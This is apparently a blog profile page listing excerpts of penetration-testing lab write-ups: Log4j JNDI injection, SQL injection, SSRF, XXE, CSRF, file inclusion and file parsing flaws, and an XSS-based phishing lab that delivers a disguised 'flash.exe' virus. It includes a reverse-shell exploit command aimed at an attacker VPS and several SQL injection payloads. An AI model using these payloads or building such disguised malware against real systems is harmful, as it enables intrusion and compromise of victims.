- 博客(19)
- 收藏
- 关注
原创 loaj4j 靶机教程
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。在DNSLOG平台上获取一个域名来看我们注入的效果。开始反弹shell,构造payload。base64加密一下。
2025-03-14 17:40:33
293
原创 Hackme靶机通关教程
查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
2025-03-13 19:37:58
142
原创 文件解析漏洞靶场
iis6.x 目录解析在网站根目录建一个名为a.asp的文件在a.asp中建一个jpg文件内容为<%=now()%> asp代码在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执行在新建一个2.jpg文件放在a.asp同级目录下再次打开,发现没有被解析,由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏.畸形文件解析在IIS 6 处理⽂件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是 shell.asp。
2025-03-13 18:34:44
1304
原创 tomato靶机
image=/etc/passwd 有回显存在文件包含。kali不行用centos系统通过ssh把木马写入到日志里面。f12看源代码可能存在文件包含。8888端口有一个登录框。2211是一个远程连接。
2025-03-12 18:45:45
175
原创 upload-labs通关攻略
哥斯拉制作木马上传php木马发现只能 上传jpg图片类的上传时发现是前端处理 f12把限制上传点的地方删掉上传成功右键打开图片地址连接。
2025-03-11 20:06:22
258
原创 XXE靶机通过攻略
得到一串乱码,在自己的网站根目录(www)下新建一个php文件,将这一串乱码复制到其中。发现一个登录框,输入任意 Name 和 Psaaword ,使用bp抓取登录数据包。根据得到的php代码可知flag的位置,复制括号中的内容进行一次base64解码。点击flag,又得到一个文件 /flagmeout.php。我们可以得到一个存放flag的目录,再次读取该文件。得到一个登录页面,使用前面的账号密码登录。把再次得到的内容进行一次base64解码。浏览器访问该文件,就能得到flag。
2025-03-10 19:17:02
111
原创 CTFHub-ssrf2
根据提示这关是HTTP 发送POST请求首先在url后面输入http://127.0.0.1/flag.php 发现一个框看源代码后发现一个key把key提交到框那里抓包把多余的包删掉进行url编码把%0a替换成%0d%0a进行二次编码把编码的值放到url后提交 页面空白把编码后的%253a换成冒号 结果就出来了。
2025-03-07 15:55:53
408
原创 ctfhub-ssrf通关攻略
根据提示发现127-172被禁了,但是又要访问127所以使用localhost绕过。根据题目提示访问127.0.0.1/flag.php flag就出来了。根据提示发现端口在8000-9000中,我们抓包burp测一下。根据题目提示读取web目录下的flag.php。根据提示发现这关可以使用localhost绕过。根据题目附件找到这个网站进行ip重绑定。flag在网页源代码中。这关根据提示必须包含的内容+@绕过。成功在8943端口发现flag。6.302 跳转By pass。flag在网页源代码中。
2025-03-06 18:49:11
114
原创 metinfo靶机教程 csrf漏洞
5.然后我们再打开另一个浏览器,模拟被攻击者,要确保用户保持登录状态,不然不会成功。4.把这个保存成html文件放到www目录下。打开连接后,就创建了一个admin1管理员。现在这里只有一个admin。3.修改这个包生成poc。3.添加管理员这里抓包。
2025-03-06 18:09:00
206
原创 XSS利用Flash弹窗钓鱼教程
8.上面的flash.exe是我们要让管理员下载运行的病毒文件,当管理员下载运行后我们就能控制管理员电脑了,现在要做的就是如何制作伪装病毒。14.这个病毒已经能够正常使用,我们先在kali中当作攻击者对自己的病毒进行监听,看看受害者有没有点击病毒,如果点击,我们会收到这个监听。3.寻找受害者,这次目标为pikachu后台的管理员,找一个xss漏洞让管理员的页面引用外部我们的js文件。5.当管理员信以为真点击立即升级的时候,会让管理员下载一个可执行程序,控制下载文件的代码在1.js中。
2025-03-05 20:13:20
169
原创 sql-labs-16-20关通关攻略
经过测试这关闭合为")没回显用盲注爆数据库长度为8爆数据库名根据对应ascii值得知第一个字母为s其他字母以此类推最后得出数据库为security判断表名字发现第四个表名第一个字符ascii码大于116正常,大于117页面false,得到第四个表名第一个字符ascii码为117,说明是字符’u’通过substr(表名,1,1)递增标注数字到5,猜出此表名名字为users判断列名长度判断列名字判断第二个列名第一个字符大于116正常,大于117页面false。
2025-03-04 20:06:24
395
原创 CTF4靶机
可以看到爆出来几个数据库,可以看到ehks库在上面的sql目录中见过,根据提示可以知道这里面有用户名跟密码。在网页的首页随便点,点到blog目录下的文件,可以看到出现了id=5 可能存在sql注入。在robotx.txt文件的sql目录下看到些数据库的信息。输入个' 号报错,应该是存在SQL注入,准备进行爆破。对ehks库继续进行爆破。对user表继续爆破。就得到用户名和密码了。
2025-03-04 19:13:53
154
原创 sqli-labs 13-15
users表的第一个字段的第一位字符ascii码为105 'i' :1' or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105#第一位字符ascii码等于115 :1' or ascii(substr(database(),1,1))=115#
2025-03-03 19:50:33
500
原创 Ai-web 1.0通关攻略
扫描到:192.168.182.167。发现index.php文件,浏览器访问。扫描到了一个info.php。访问后发现了网站的绝对路径。用--os-shell参数。用dirb扫描另一个路径。发现登录框,输入1抓包。用工具sqlmap扫描。4.判断是否存在注入。
2025-03-03 19:45:51
250
原创 sql-labs·5-8关通关教程
有报错信息的回显,说明可以进行报错注入?判断数据库的长度布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符判断所有表名字符长度?逐一判断表名?逐一判断字段名?判断字段内容长度?
2025-02-27 19:41:27
305
原创 sqli-labs通关攻略
可以根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显,所以我们可以使用联合查询。联合查询原理简单说一下,联合查询就是两个sql语句一起查询,两张表具有相同的列数,且字段名是一样的。获取当前数据名和版本号,这个就涉及mysql数据库的一些函数,记得就行。爆出显示位,就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的。通过数字值不同返回的内容也不同,所以我们输入的内容是带入到数据库里面查询。首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。
2025-02-26 19:11:58
169
原创 ctfhub-web信息泄露通过攻略
拼接到www.zip后下载了一个文件,进行解压缩点开txt文件并没有发现flag。按Ctrl+F搜索关键词'ctfhub'就能找到flag。启动环境-发现很多备份文件后缀和备份文件名。把文件名进行拼接后发现flag。有四个文件夹挨个点开找flag。
2025-02-25 19:57:37
86
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人